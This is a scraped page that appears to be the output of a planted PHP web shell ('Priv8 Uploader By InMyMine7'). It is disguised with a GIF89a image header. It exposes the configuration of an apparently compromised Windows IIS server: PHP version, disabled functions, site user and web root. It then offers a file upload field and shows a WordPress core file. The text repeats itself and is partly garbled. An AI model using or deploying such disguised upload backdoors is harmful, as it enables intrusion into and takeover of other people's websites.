GIF89a;
GIF89a;Priv8 Uploader By InMyMine7
Windows NT 5KQS5 10.0 build 17763 (Windows Server 2016) AMD64
GIF89a;Priv8 Uploader By InMyMine7
Windows NT 5KQS5 10.0 build 17763 (Windows Server 2016) AMD64
Priv8 Uploader By InMyMine7
Windows NT 5KQS5 10.0 build 17763 (Windows Server 2016) AMD64
|
Server : Microsoft-IIS/10.0 System : Windows NT 5KQS5 10.0 build 17763 (Windows Server 2016) AMD64 User : 80.com ( 0) PHP Version : 7.4.33 Disable Function : passthru,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,putenv,exec Directory : d:/wwwroot/80.com/ |
Upload File : |
<?php
/**
* Loads the WordPress environment and template.
*
* @package WordPress
*/
if ( ! isset( $wp_did_header ) ) {
$wp_did_header = true;
// Load the WordPress library.
require_once __DIR__ . '/wp-load.php';
// Set up the WordPress query.
wp();
// Load the theme template.
require_once ABSPATH . WPINC . '/template-loader.php';
}